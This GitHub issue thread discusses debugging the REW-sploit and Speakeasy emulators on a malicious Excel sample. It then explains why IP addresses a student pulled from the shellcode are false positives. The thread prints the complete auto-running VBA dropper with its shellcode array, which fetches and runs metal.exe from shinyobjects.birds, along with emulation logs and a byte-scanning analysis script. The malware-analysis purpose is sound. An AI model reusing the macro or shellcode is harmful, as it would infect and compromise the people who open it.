shellcode: Caught error: 'NoneType' object has no attribute 'startswith' #13
Comments
Hello. Thanks for opening the issue. Would you mind sharing the shell.bin file? Thanks! |
By the way I am able to run this just using Speakeasy.
I was just curious to run it in REW-sploit.
This is part of an ongoing competition/challenge that ends Sunday.
Thanks,
Michelle
Quoted reply from cecio, Saturday, May 14, 2022:
Hello.
Thanks for opening the issue.
Would you mind sharing the shell.bin file?
It would be very helpful to track down the problem.
Thanks!
|
Interesting... If you want to share it, I would be happy to look into this (even after the challenge has ended, if you prefer). You can upload it here if you want: https://icedrive.net/r/35PGvd8pbfDBdcdhTf3hc9Gdp8DdcdPfBdHTk4b3 |
Hello Michelle. If you'd like to share the sample, I'd like to look into this error. https://icedrive.net/r/xdfhBdBkF2Cz9pf3G25HrF77GR4VkpFfk6k577xd Thanks a lot |
It's already on VirusTotal. I can send you the original zipped file if you'd like.
Quoted reply from cecio, Tuesday, May 17, 2022:
Hello Michelle.
If you'd like to share the sample, I'd like to look into this error.
In case, here is the new link to upload it (the old one has expired):
https://icedrive.net/r/xdfhBdBkF2Cz9pf3G25HrF77GR4VkpFfk6k577xd
Thanks a lot
|
Yes, please, if you can send it, that would be helpful. Thanks! |
Here is the original zipped file.
Hopefully you can let me know when you've fixed the bug?
Thanks,
Michelle
Quoted reply from cecio, Wednesday, May 18, 2022:
Yes, please, if you can send it, that would be helpful.
Thanks!
|
Hello Michelle. I don't see the file nor a link. Thanks! |
That is bizarre. I will send it one more time.
I see it on my end. Maybe because it's 28KB?
Or maybe it's been identified as malicious.
Here it is. If you don't see it let me know another way to send it to you.
Quoted reply from cecio, Wednesday, May 18, 2022:
Hello Michelle.
I don't see the file nor a link.
Where did you put it?
Thanks!
|
No, no files. You can upload it here: https://icedrive.net/r/xdfhBdBkF2Cz9pf3G25HrF77GR4VkpFfk6k577xd Thanks, |
Quoted reply from cecio, Wednesday, May 18, 2022:
No, no files.
You can upload it here:
https://icedrive.net/r/xdfhBdBkF2Cz9pf3G25HrF77GR4VkpFfk6k577xd
Thanks,
|
great, got it. Thanks! |
By the way I'm new to malware analysis. If you're not busy, can you answer the following question?
I extracted a bunch of IP addresses from the shellcode. Do you have any idea why they would be different from what shows up in VirusTotal?
It's from the sample I gave you.
Thanks,
Michelle
Quoted reply from cecio, Thursday, May 19, 2022:
great, got it. Thanks!
I'll let you know
|
Ok, I replicated the issue, it's a missing check in Speakeasy. I'm going to make a pull request on the SpeakEasy branch to fix this. Regarding your question: I'm not sure which IP you are referring to, but I found some analysis on VirusTotal with several IPs listed: all of them are Microsoft IPs, which is probably only "noise" created by Excel or the virtualization environment. Thanks in the meantime |
The pull request: |
I'm assuming these IP addresses which appear on VirusTotal are from the malware:
I'm assuming these are Cobalt C2 servers. The IP addresses I extract from the shellcode of the malware are different from above. Why is that? What do you mean they are probably noise from emulation environment?
Quoted reply from cecio, Friday, May 20, 2022:
Ok, I replicated the issue, it's a missing check in Speakeasy.
I'm going to make a pull request on the SpeakEasy branch to fix this.
Thanks a lot for reporting this.
Regarding your question: I'm not sure which IP you are referring to, but I found some analysis on VirusTotal with several IPs listed: all of them are Microsoft IPs, which is probably only "noise" created by Excel or the emulation environment.
If you show me which analysis you are referring to, I can have a look.
Thanks in the meantime
|
If you attached a screenshot, I don't see it (images can be shared here only if you save them somewhere on the web, on github itself or to imgur for example). Try to give me the link to the page. |
BTW, by using REW-sploit I was able to complete the emulation, and this is what the injected part is doing:
|
Thanks. This is what I got from Speakeasy, which just loops from CreateProcess to Sleep:
0x109b: 'kernel32.GetStartupInfoA(0x1203eb4)' -> None
0x10bc: 'kernel32.CreateProcessA(0x0, "rundll32", 0x0, 0x0, 0x0, "CREATE_NO_WINDOW | CREATE_SUSPENDED", 0x0, 0x0, 0x1203eb4, 0x1203f14)' -> 0x1
0x10d3: 'kernel32.VirtualAllocEx("rundll32", 0x0, 0x1000, 0x1000, "PAGE_EXECUTE_READWRITE")' -> 0x50000
0x10e5: 'kernel32.WriteProcessMemory("rundll32", 0x50000, 0x1114, 0x1be, 0x1203e54)' -> 0x1
0x10f8: 'kernel32.CreateRemoteThread("rundll32", 0x0, 0x0, 0x50000, 0x0, 0x0, 0x0)' -> 0x228
0x1101: 'kernel32.Sleep(0xffffffff)' -> None
Did you give Speakeasy any DLLs to get the output from REW-sploit in your email below?
So for the list of IP addresses, I get the IP list when I put the unzipped xls file in VirusTotal so I do not have a link to share. So I am still wondering why the IP addresses I extracted from the shellcode are different from what VirusTotal shows when you put the invoice-02-01-2022.xls file in VirusTotal.
Quoted reply from cecio, Saturday, May 21, 2022:
BTW, by using REW-sploit I was able to complete the emulation, and this is what the injected part is doing:
[+] Emulation ended
(REW-sploit)<< emulate_payload -P /tmp/tmpnjm0m40e/0x50000.bin -U 0
[+] Starting emulation
* exec: shellcode
0x10a4: 'kernel32.LoadLibraryA("wininet")' -> 0x7c054000
0x10b2: 'wininet.InternetOpenA("wininet", 0x0, 0x0, 0x0, 0x0)' -> 0x20
0x10c8: 'wininet.InternetConnectA(0x20, "shinyobjects.birds", 0x50, 0x0, 0x0, 0x3, 0x0, 0x0)' -> 0x24
0x10e0: 'wininet.HttpOpenRequestA(0x24, 0x0, "/metal.exe", 0x0, 0x0, 0x0, "INTERNET_FLAG_DONT_CACHE | INTERNET_FLAG_IGNORE_CERT_CN_INVALID | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID | INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_NO_AUTO_REDIRECT | INTERNET_FLAG_NO_UI | INTERNET_FLAG_RELOAD", 0x0)' -> 0x28
0x10f9: 'wininet.InternetSetOptionA(0x28, 0x1f, 0x1203fd8, 0x4)' -> 0x1
0x1107: 'wininet.HttpSendRequestA(0x28, 0x0, 0x0, 0x0, 0x0)' -> 0x1
0x1140: 'kernel32.CreateFileA("chrome.exe", 0x2, 0x2, 0x0, "CREATE_ALWAYS", 0x2, 0x0)' -> 0x80
0x115c: 'wininet.InternetReadFile(0x28, 0x1203cd8, 0x300, 0x1203cd4)' -> 0x1
0x1176: 'kernel32.WriteFile(0x80, "0x1203cd8 (90909090909090909090909090909090)", 0x300, 0x1203cd4, 0x0)' -> 0x1
0x115c: 'wininet.InternetReadFile(0x28, 0x1203cd8, 0x300, 0x1203cd4)' -> 0x1
0x1176: 'kernel32.WriteFile(0x80, "0x1203cd8 (cccccccccccccccccccccccccccccccc)", 0x300, 0x1203cd4, 0x0)' -> 0x1
0x115c: 'wininet.InternetReadFile(0x28, 0x1203cd8, 0x300, 0x1203cd4)' -> 0x1
0x1176: 'kernel32.WriteFile(0x80, "0x1203cd8 (cccccccccccccccccccccccccccccccc)", 0x300, 0x1203cd4, 0x0)' -> 0x1
0x115c: 'wininet.InternetReadFile(0x28, 0x1203cd8, 0x300, 0x1203cd4)' -> 0x1
0x1176: 'kernel32.WriteFile(0x80, "0x1203cd8 (cccccccccccccccccccccccccccccccc)", 0x300, 0x1203cd4, 0x0)' -> 0x1
0x115c: 'wininet.InternetReadFile(0x28, 0x1203cd8, 0x300, 0x1203cd4)' -> 0x1
0x1176: 'kernel32.WriteFile(0x80, "0x1203cd8 (cccccccccccccccccccccccccccccccc)", 0x300, 0x1203cd4, 0x0)' -> 0x1
0x115c: 'wininet.InternetReadFile(0x28, 0x1203cd8, 0x300, 0x1203cd4)' -> 0x1
0x1176: 'kernel32.WriteFile(0x80, "0x1203cd8 (cccccccccccccccccccccccccccccccc)", 0x100, 0x1203cd4, 0x0)' -> 0x1
0x115c: 'wininet.InternetReadFile(0x28, 0x1203cd8, 0x300, 0x1203cd4)' -> 0x1
0x1183: 'kernel32.CloseHandle(0x80)' -> 0x1
0x118d: 'kernel32.WinExec("chrome.exe", 0x0)' -> 0x20
0x1196: 'kernel32.ExitProcess(0x0)' -> 0x0
0x1196: 'kernel32.ExitProcess(0x0)' -> 0x0
|
No, I just used some of the add-ons of REW-sploit: as you can see, the first emulation creates a new process and then it creates a new thread in it. By using the -T option in emulate_payload, you can easily dump the thread content and then emulate it with a second run. Consider that right now this will not work for you, since we don't have the pull request merged in Speakeasy yet. As soon as it is done I'll publish a new release with this modification.
Regarding the IPs: I'm not sure which IPs you extracted from the shellcode. The only domain contacted seems to be shinyobjects.birds, which is non-existent... so no IPs were actually contacted. But I didn't fully disassemble the sample, so I may be wrong. I just base my assertion on the emulation output. If you want to share the IPs and how you extracted them I can have a look.
If I look in VirusTotal for the MD5 of the file you sent me, I see something like this: https://www.virustotal.com/gui/file/a3f128976fb477883db4f7ecc2aae05e61e2de224ad584454022aced8f8f5ca5/relations
If these are the IPs you are referring to, you can see that they are all Microsoft related. What I can guess here is that these IPs are contacted by the VM used for the analysis (or by Excel when it starts) and they were not filtered out from the execution result. But they do not have anything to do with the malware itself. This is what I mean by "noise" generated by the analysis. And this is why emulation (vs virtualization) can give you better results. |
What's the best way to post what I found? I used Didier Stevens' 1768.py script to extract the IP addresses, but I had to decode, so to speak, the shellcode first. After googling around I could not find a similar output to what I found below from running 1768.py, the latest version.
Here is a partial list of the IP addresses from running 1768.py on the shellcode from the VBA code from the unzipped version. I then looked them up to see if they are legitimate IP addresses and they seem to be legitimate.
I would assume these are Cobalt C2 servers. Shouldn't these be listed in VirusTotal instead of what you saw with the Microsoft noise IP addresses?
Name, City and Country as listed in iplocation.io/ip-whois-lookup - first block
mov eax : 128 1965325627 59.125.36.117 Chunghwa Telecom Co., Ltd, Taipei City, Taiwan
push : 206 1800057282 194.177.74.107 Dino Bortolotto, Padova, Italy
push : 237 1397950468 4.8.83.83 Level 3 Parent, LLC, Monroe, LA
push : 245 1066189689 121.195.140.63 China Education and Research Network, Beijing, China
push : 278 2277682882 194.174.194.135 Social Online GmbH, Adelsried, Germany
push : 291 3271671490 194.190.1.195 Telecom Samara LLC, Kinel, Russia
push : 302 2562950595 195.133.195.152 Gipromez-network, Moscow, Russia
push : 330 2898429635 195.134.194.172 US-GGTTCOMMUNICATIONS-19970425, Great Britain
What's interesting is that when I cut the shellcode into pieces (just experimenting), I would get different IP addresses from the above list.
Quoted reply from cecio, Monday, May 23, 2022:
No, I just used some of the add-ons of REW-sploit:
as you can see, the first emulation creates a new process and then it creates a new thread in it. By using the -T option in emulate_payload, you can easily dump the thread content and then emulate it with a second run.
Consider that right now this will not work for you, since we don't have the pull request merged in Speakeasy yet.
As soon as it is done I'll publish a new release with this modification.
Regarding the IPs: I'm not sure which IPs you extracted from the shellcode. The only domain contacted seems to be shinyobjects.birds, which is non-existent... so no IPs were actually contacted. But I didn't fully disassemble the sample, so I may be wrong. I just base my assertion on the emulation output. If you want to share the IPs and how you extracted them I can have a look.
If I look in VirusTotal for the MD5 of the file you sent me, I see something like this:
https://www.virustotal.com/gui/file/a3f128976fb477883db4f7ecc2aae05e61e2de224ad584454022aced8f8f5ca5/relations
If these are the IPs you are referring to, you can see that they are all Microsoft related. What I can guess here is that these IPs are contacted by the VM used for the analysis (or by Excel when it starts) and they were not filtered out from the execution result. But they do not have anything to do with the malware itself.
This is what I mean by "noise" generated by the analysis. And this is why emulation (vs virtualization) can give you better results.
|
Hello Michelle. To be able to reply to you, I need to have a look at the exact code you are using to run the script and the complete command line used. If you want you can upload it here: https://icedrive.net/r/D8trdddVTfrRDg395bBc3z9dBPXDFZhtKZXRcgF7 Right now, what I can say is that these look to be false positives. Consider that these static tools work great when the input is exactly what they expect, but if:
* the input is not a CS beacon
* the input is not a "standard" CS beacon
the results can be totally misleading. From what I saw in the code, there is no evidence of the presence of these IPs. This is another reason to use emulation instead of static tools: usually malicious code uses obfuscation/encryption to hide details, and that's why static tools may fail in doing analysis. |
Pull request has been merged in Speakeasy. I also published a new release to use the latest commit of it. |
I spoke to my professor and she said it's possible these could be VPN addresses, so I will need to investigate further. Also I need to confirm the results somehow. But for now the command is
$ python3 1768.py filename
April 16, 2022 version of 1768.py. This extracts Cobalt Strike Beacon configurations.
https://github.com/DidierStevens/DidierStevensSuite/blob/master/1768.py
Quoted reply from cecio, Monday, May 23, 2022:
Hello Michelle.
To be able to reply to you, I need to have a look at the exact code you are using to run the script and the complete command line used. If you want you can upload it here: https://icedrive.net/r/D8trdddVTfrRDg395bBc3z9dBPXDFZhtKZXRcgF7
Right now, what I can say is that these look to be false positives. Consider that these static tools work great when the input is exactly what they expect, but if:
* the input is not a CS beacon
* the input is not a "standard" CS beacon
the results can be totally misleading. From what I saw in the code, there is no evidence of the presence of these IPs. This is another reason to use emulation instead of static tools: usually malicious code uses obfuscation/encryption to hide details, and that's why static tools may fail in doing analysis.
|
Sorry, maybe I was not clear. What I need is not the code of 1768.py, but the code of the shellcode analyzed. |
Hi,
Did the shellcode you extracted consist of a bunch of numbers?
And say you did see the IP addresses, how would you confirm if they are false positives or legitimate IP addresses?
Quoted reply from cecio, Tuesday, May 24, 2022:
Sorry, maybe I was not clear. What I need is not the code of 1768.py, but the code of the shellcode analyzed.
This is because I think we are looking at two different things.
For the one I analyzed (the one extracted from the Excel file), I don't see the IPs you are mentioning, even if I run the 1768.py script on it.
Thanks.
|
Hello Michelle. Yes, the shellcode I'm analyzing comes from the array in the VBS script in the Excel file. Once extracted and emulated in REW-sploit I see:
* as a first step, the loop you mentioned from CreateProcess to Sleep
* as a second step (the dumped thread from the step before), the other list I posted above (connection to shinyobjects.birds, download of 'metal.exe', etc... until the process is exited)
All these things are coming out of the shellcode saved in the Excel file you sent me once processed with REW-sploit. I don't see any other IP there (the only connection attempted is against shinyobjects.birds). Even if I run the 1768.py utility on that shellcode, I don't see any IP dumped by the utility. That's why I think we are looking at two different things. In the message from yesterday you said:
"but I had to decode, so to speak, the shellcode first"
I'm not sure what you mean here, which kind of decoding you applied. The array itself was valid executable position-independent code, so no decoding was needed. Otherwise, it would be impossible to emulate it. Thanks, |
So you saw this when you extracted the VBA code?
#If VBA7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Sna As Long, ByVal Ekeqyz As Long, ByVal Iciggaxc As LongPtr, Nlin As Long, ByVal Hhmuvx As Long, Ovdaxfn As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Gxdk As Long, ByVal Ehceqkkx As Long, ByVal Gkryn As Long, ByVal Tsa As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Xaprnto As LongPtr, ByRef Cztskpau As Any, ByVal Vtyiwscis As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" (ByVal Sna As Long, ByVal Ekeqyz As Long, ByVal Iciggaxc As Long, Nlin As Long, ByVal Hhmuvx As Long, Ovdaxfn As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Gxdk As Long, ByVal Ehceqkkx As Long, ByVal Gkryn As Long, ByVal Tsa As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Xaprnto As Long, ByRef Cztskpau As Any, ByVal Vtyiwscis As Long) As Long
#End If
Sub Auto_Open()
Dim Nhxbticl As Long, Wtnqycur As Variant, Ugqir As Long
#If VBA7 Then
Dim Ezhyuw As LongPtr, Vowtv As LongPtr
#Else
Dim Ezhyuw As Long, Vowtv As Long
#End If
Wtnqycur = Array(252, 232, 130, 0, 0, 0, 96, 137, 229, 49, 192, 100, 139, 80, 48, 139, 82, 12, 139, 82, 20, 139, 114, 40, 15, 183, 74, 38, 49, 255, 172, 60, 97, 124, 2, 44, 32, 193, 207, 13, 1, 199, 226, 242, 82, 87, 139, 82, 16, 139, 74, 60, 139, 76, 17, 120, 227, 72, 1, 209, 81, 139, 89, 32, 1, 211, 139, 73, 24, 227, 58, 73, 139, 52, 139, 1, 214, 49, 255, 172, 193, _
207, 13, 1, 199, 56, 224, 117, 246, 3, 125, 248, 59, 125, 36, 117, 228, 88, 139, 88, 36, 1, 211, 102, 139, 12, 75, 139, 88, 28, 1, 211, 139, 4, 139, 1, 208, 137, 68, 36, 36, 91, 91, 97, 89, 90, 81, 255, 224, 95, 95, 90, 139, 18, 235, 141, 93, 129, 196, 112, 254, 255, 255, 141, 84, 36, 96, 82, 104, 177, 74, 107, 177, 255, 213, 141, 68, 36, 96, 235, 96, _
94, 141, 120, 96, 87, 80, 49, 219, 83, 83, 104, 4, 0, 0, 8, 83, 83, 83, 86, 83, 104, 121, 204, 63, 134, 255, 213, 133, 192, 116, 84, 106, 64, 128, 199, 16, 83, 83, 49, 219, 83, 255, 55, 104, 174, 135, 146, 63, 255, 213, 84, 104, 190, 1, 0, 0, 235, 52, 80, 255, 55, 104, 197, 216, 189, 231, 255, 213, 83, 83, 83, 139, 76, 36, 252, 81, 83, 83, 255, 55, _
104, 198, 172, 154, 121, 255, 213, 106, 255, 104, 68, 240, 53, 224, 255, 213, 232, 155, 255, 255, 255, 114, 117, 110, 100, 108, 108, 51, 50, 0, 232, 199, 255, 255, 255, 252, 232, 137, 0, 0, 0, 96, 137, 229, 49, 210, 100, 139, 82, 48, 139, 82, 12, 139, 82, 20, 139, 114, 40, 15, 183, 74, 38, 49, 255, 49, 192, 172, 60, 97, 124, 2, 44, 32, 193, 207, 13, 1, 199, 226, _
240, 82, 87, 139, 82, 16, 139, 66, 60, 1, 208, 139, 64, 120, 133, 192, 116, 74, 1, 208, 80, 139, 72, 24, 139, 88, 32, 1, 211, 227, 60, 73, 139, 52, 139, 1, 214, 49, 255, 49, 192, 172, 193, 207, 13, 1, 199, 56, 224, 117, 244, 3, 125, 248, 59, 125, 36, 117, 226, 88, 139, 88, 36, 1, 211, 102, 139, 12, 75, 139, 88, 28, 1, 211, 139, 4, 139, 1, 208, 137, _
68, 36, 36, 91, 91, 97, 89, 90, 81, 255, 224, 88, 95, 90, 139, 18, 235, 134, 93, 104, 110, 101, 116, 0, 104, 119, 105, 110, 105, 137, 230, 84, 104, 76, 119, 38, 7, 255, 213, 49, 255, 87, 87, 87, 87, 86, 104, 58, 86, 121, 167, 255, 213, 235, 96, 91, 49, 201, 81, 81, 106, 3, 81, 81, 106, 80, 83, 80, 104, 87, 137, 159, 198, 255, 213, 235, 79, 89, 49, 210, _
82, 104, 0, 50, 96, 132, 82, 82, 82, 81, 82, 80, 104, 235, 85, 46, 59, 255, 213, 137, 198, 106, 16, 91, 104, 128, 51, 0, 0, 137, 224, 106, 4, 80, 106, 31, 86, 104, 117, 70, 158, 134, 255, 213, 49, 255, 87, 87, 87, 87, 86, 104, 45, 6, 24, 123, 255, 213, 133, 192, 117, 30, 75, 15, 132, 123, 0, 0, 0, 235, 209, 233, 141, 0, 0, 0, 232, 172, 255, 255, _
255, 47, 109, 101, 116, 97, 108, 46, 101, 120, 101, 0, 235, 107, 49, 192, 95, 80, 106, 2, 106, 2, 80, 106, 2, 106, 2, 87, 104, 218, 246, 218, 79, 255, 213, 147, 49, 192, 102, 184, 4, 3, 41, 196, 84, 141, 76, 36, 8, 49, 192, 180, 3, 80, 81, 86, 104, 18, 150, 137, 226, 255, 213, 133, 192, 116, 45, 88, 133, 192, 116, 22, 106, 0, 84, 80, 141, 68, 36, 12, _
80, 83, 104, 45, 87, 174, 91, 255, 213, 131, 236, 4, 235, 206, 83, 104, 198, 150, 135, 82, 255, 213, 106, 0, 87, 104, 49, 139, 111, 135, 255, 213, 106, 0, 104, 240, 181, 162, 86, 255, 213, 232, 144, 255, 255, 255, 99, 104, 114, 111, 109, 101, 46, 101, 120, 101, 0, 232, 9, 255, 255, 255, 115, 104, 105, 110, 121, 111, 98, 106, 101, 99, 116, 115, 46, 98, 105, 114, 100, 115, _
0)
Ezhyuw = VirtualAlloc(0, UBound(Wtnqycur), &H1000, &H40)
For Ugqir = LBound(Wtnqycur) To UBound(Wtnqycur)
Nhxbticl = Wtnqycur(Ugqir)
Vowtv = RtlMoveMemory(Ezhyuw + Ugqir, Nhxbticl, 1)
Next Ugqir
Vowtv = CreateThread(0, 0, Ezhyuw, 0, 0, 0)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Quoted reply from cecio, Tuesday, May 24, 2022:
Hello Michelle.
Yes, the shellcode I'm analyzing comes from the array in the VBS script in the Excel file. Once extracted and emulated in REW-sploit I see:
* as a first step, the loop you mentioned from CreateProcess to Sleep
* as a second step (the dumped thread from the step before), the other list I posted above (connection to shinyobjects.birds, download of 'metal.exe', etc... until the process is exited)
All these things are coming out of the shellcode saved in the Excel file you sent me once processed with REW-sploit. I don't see any other IP there (the only connection attempted is against shinyobjects.birds).
Even if I run the 1768.py utility on that shellcode, I don't see any IP dumped by the utility. That's why I think we are looking at two different things.
In the message from yesterday you said:
"but I had to decode, so to speak, the shellcode first"
I'm not sure what you mean here, which kind of decoding you applied. The array itself was valid executable position-independent code, so no decoding was needed. Otherwise, it would be impossible to emulate it.
Thanks,
|
yes, exactly |
If I run 1768.py (with option -r) on the shellcode (the array starting with 252), this is the result:
Parameter: 701 b'shinyobjects.birds'
push : 212 446 b'h\xbe\x01\x00\x00'
push : 505 13184 b'h\x803\x00\x00'
So, maybe you are doing something different... |
I was in this cybersecurity competition last month. This was one of the challenges:
204 218 231 209 228 236 224 149 236 218 217 217 149 227 222 211 228 228 225 149 223 228 227 149 210 231 149 238 229 209 210 225 222 149 218 231 149 163 163 149 230 218 231 238 225 222 224
It said that this was an encrypted message and they needed our help to decode it. I was not able to decode it. But this looks like the shellcode in its number range.
So I experimented with decoding or transforming the shellcode. I used Cyberchef to transform the shellcode. And used that with 1768.py.
And that's it.
Quoted reply from cecio, Wednesday, May 25, 2022:
If I run 1768.py (with option -r) on the shellcode (the array starting with 252), this is the result:
Parameter: 701 b'shinyobjects.birds'
push : 212 446 b'h\xbe\x01\x00\x00'
push : 505 13184 b'h\x803\x00\x00'
So, maybe you are doing something different...
|
OK, clear now. Consider a few aspects:
* everything represented as a byte is in the range from 0 to 255, so it's very easy to be in the same range
* if you look at the VBA code, you don't see any transformation of the byte sequence. It is used just as it is and passed to CreateThread
* given what was stated before, any further transformation should be done by the shellcode itself, so in this case the emulation is helping you in "unrolling" this kind of obfuscation, and you don't need to apply any further change
Applying an arbitrary transformation to what is executable code (like in this case, because it is passed to a CreateThread API) will not give you anything meaningful to analyze, unless you are sure that the same transformation is in some way done at some point of the process execution. But in this case we don't have any evidence of this, so the code we need to analyze is just the plain array dumped from the VBA. |
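As an added illustration of the point above (example code written for this page, not code from REW-sploit, 1768.py or the thread's participants): a scan that treats every 0x68 byte in the second stage of the array quoted earlier as `push imm32`, the way a context-free static extractor would, and renders each 4-byte immediate as an IPv4 address. Using the `call ebp` that follows each stub and the API names the emulation log above resolved, the same dwords turn out to be ROR13 API hashes, string fragments (including the 'h' inside "chrome.exe" and "shinyobjects.birds") and plain constants; the 13184 that 1768.py reported in the thread is the `push 0x3380` found here. The byte chunk is copied from the quoted VBA array and the hash-to-name table is constructed from the thread's emulation output.

```python
"""Context-free 'push imm32' scan over the second stage of the shellcode array
quoted in this issue. Example written for this page; not REW-sploit or 1768.py code."""
from dataclasses import dataclass
from typing import Dict, List

# Bytes copied from the VBA array quoted above: the second stage, from the
# push of "net\0" after the API-resolver stub through the final 0.
STAGE2 = bytes([
    104, 110, 101, 116, 0, 104, 119, 105, 110, 105, 137, 230, 84, 104, 76, 119, 38, 7, 255, 213,
    49, 255, 87, 87, 87, 87, 86, 104, 58, 86, 121, 167, 255, 213, 235, 96, 91, 49, 201, 81,
    81, 106, 3, 81, 81, 106, 80, 83, 80, 104, 87, 137, 159, 198, 255, 213, 235, 79, 89, 49,
    210, 82, 104, 0, 50, 96, 132, 82, 82, 82, 81, 82, 80, 104, 235, 85, 46, 59, 255, 213,
    137, 198, 106, 16, 91, 104, 128, 51, 0, 0, 137, 224, 106, 4, 80, 106, 31, 86, 104, 117,
    70, 158, 134, 255, 213, 49, 255, 87, 87, 87, 87, 86, 104, 45, 6, 24, 123, 255, 213, 133,
    192, 117, 30, 75, 15, 132, 123, 0, 0, 0, 235, 209, 233, 141, 0, 0, 0, 232, 172, 255,
    255, 255, 47, 109, 101, 116, 97, 108, 46, 101, 120, 101, 0, 235, 107, 49, 192, 95, 80, 106,
    2, 106, 2, 80, 106, 2, 106, 2, 87, 104, 218, 246, 218, 79, 255, 213, 147, 49, 192, 102,
    184, 4, 3, 41, 196, 84, 141, 76, 36, 8, 49, 192, 180, 3, 80, 81, 86, 104, 18, 150,
    137, 226, 255, 213, 133, 192, 116, 45, 88, 133, 192, 116, 22, 106, 0, 84, 80, 141, 68, 36,
    12, 80, 83, 104, 45, 87, 174, 91, 255, 213, 131, 236, 4, 235, 206, 83, 104, 198, 150, 135,
    82, 255, 213, 106, 0, 87, 104, 49, 139, 111, 135, 255, 213, 106, 0, 104, 240, 181, 162, 86,
    255, 213, 232, 144, 255, 255, 255, 99, 104, 114, 111, 109, 101, 46, 101, 120, 101, 0, 232, 9,
    255, 255, 255, 115, 104, 105, 110, 121, 111, 98, 106, 101, 99, 116, 115, 46, 98, 105, 114, 100,
    115, 0,
])

# ROR13 API hashes pushed before 'call ebp' in this stage, named as the
# REW-sploit/Speakeasy emulation log earlier in the thread resolves them.
API_HASHES: Dict[int, str] = {
    0x0726774C: "kernel32.LoadLibraryA",
    0xA779563A: "wininet.InternetOpenA",
    0xC69F8957: "wininet.InternetConnectA",
    0x3B2E55EB: "wininet.HttpOpenRequestA",
    0x869E4675: "wininet.InternetSetOptionA",
    0x7B18062D: "wininet.HttpSendRequestA",
    0x4FDAF6DA: "kernel32.CreateFileA",
    0xE2899612: "wininet.InternetReadFile",
    0x5BAE572D: "kernel32.WriteFile",
    0x528796C6: "kernel32.CloseHandle",
    0x876F8B31: "kernel32.WinExec",
    0x56A2B5F0: "kernel32.ExitProcess",
}
CALL_EBP = b"\xff\xd5"  # the 'call ebp' that follows every hash push


@dataclass
class Candidate:
    offset: int    # offset of the 0x68 byte
    value: int     # little-endian dword after it
    as_ipv4: str   # the same 4 bytes printed as a.b.c.d
    kind: str      # "api-hash", "string" or "immediate"
    detail: str    # API name, decoded text, or hex constant


def dword_as_ipv4(raw: bytes) -> str:
    """Render 4 raw bytes the way an IP extractor would report them."""
    return ".".join(str(b) for b in raw)


def classify(code: bytes, i: int) -> Candidate:
    raw = code[i + 1:i + 5]
    value = int.from_bytes(raw, "little")
    ipv4 = dword_as_ipv4(raw)
    # Metasploit-style stub: 'push hash; call ebp', so require the call.
    if code[i + 5:i + 7] == CALL_EBP and value in API_HASHES:
        return Candidate(i, value, ipv4, "api-hash", API_HASHES[value])
    ascii_ok = [b == 0 or 0x20 <= b < 0x7F for b in raw]
    if all(ascii_ok) and sum(0x20 <= b < 0x7F for b in raw) >= 3:
        return Candidate(i, value, ipv4, "string", raw.rstrip(b"\0").decode())
    return Candidate(i, value, ipv4, "immediate", f"0x{value:08x}")


def scan_push_imm32(code: bytes) -> List[Candidate]:
    """Treat every 0x68 byte as 'push imm32', opcode or not, like a naive extractor."""
    return [classify(code, i) for i in range(len(code) - 4) if code[i] == 0x68]


def count_by_kind(cands: List[Candidate]) -> Dict[str, int]:
    counts: Dict[str, int] = {}
    for c in cands:
        counts[c.kind] = counts.get(c.kind, 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_push_imm32(STAGE2)
    for c in found:  # every row is an "IP" a context-free scan would report
        print(f"+0x{c.offset:03x}  {c.as_ipv4:>15}  {c.kind:<9}  {c.detail}")
    print(count_by_kind(found))
```

All 18 rows print as well-formed IPv4 addresses, yet none of them is a network indicator; the only real network artifact in this stage is the "shinyobjects.birds" string the emulation also surfaced.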
Thank you for your feedback. That has been very helpful.
In a recent malware competition people were told to convert the shellcode from decimal to charcode in Cyberchef and convert that to a binary file without explanation and then run that in Speakeasy. Now I know that that was incorrect. That was not my method, however.
I will continue to dig into this malware as the IP list I generated seems too precise to be considered false positives, as it appeared to come from the assembly language code. I'm not sure how the transformed shellcode that I generated affects the assembly language code output from the 1768.py script.
Thank you for your time.
Quoted reply from cecio, Wednesday, May 25, 2022:
OK, clear now.
Consider a few aspects:
* everything represented as a byte is in the range from 0 to 255, so it's very easy to be in the same range
* if you look at the VBA code, you don't see any transformation of the byte sequence. It is used just as it is and passed to CreateThread
* given what was stated before, any further transformation should be done by the shellcode itself, so in this case the emulation is helping you in "unrolling" this kind of obfuscation, and you don't need to apply any further change
Applying an arbitrary transformation to what is executable code (like in this case, because it is passed to a CreateThread API) will not give you anything meaningful to analyze, unless you are sure that the same transformation is in some way done at some point of the process execution. But in this case we don't have any evidence of this, so the code we need to analyze is just the plain array dumped from the VBA.
|
Thanks to you, I'm going to close the issue. Just some final words:
For what regards the IPs, I'm pretty sure they are false positives: all the code in that part has been emulated, and there is no evidence of these IPs. But I'll let you experiment with that ;-) Thanks and regards. |
Thanks!
Maybe I can pick your brain over the summer, since I do not fully understand emulation in terms of what its weaknesses are or what it could be missing, since I haven't emulated DLLs and such.
I plan to run REW-sploit over the summer too.
I need to buckle down for finals now, but I hope to keep in touch if that's okay.
Quoted reply from cecio, Thursday, May 26, 2022:
Solved with
mandiant/speakeasy#206
https://github.com/REW-sploit/REW-sploit/releases/tag/v0.4.2
|
Sure, feel free to get in touch whenever you want. Thanks! |
command:
(REW-sploit)<<emulate_payload -P shell.bin -U 0
0x10d3: Error while calling API handler for kernel32.VirtualAllocEx:
Traceback:
File ".../speakeasy/windows/winemu.py", line 1168, in handle_import_func
rv = self.api.call_api_func(mod, func, argv, ctx=default_ctx)
File ".../speakeasy/winenv/api/winapi.py", line 77, in call_api_func
return func(mod, self.emu, argv, ctx)
File ".../speakeasy/winenv/api/usermode/kernel32.py", line 995, in VirtualAllocEx
if mm and mm.get_tag().startswith(tag_prefix):
AttributeError: 'NoneType' object has no attribute 'startswith'
0x77...: shellcode: Caught error: 'NoneType' object has no attribute 'startswith'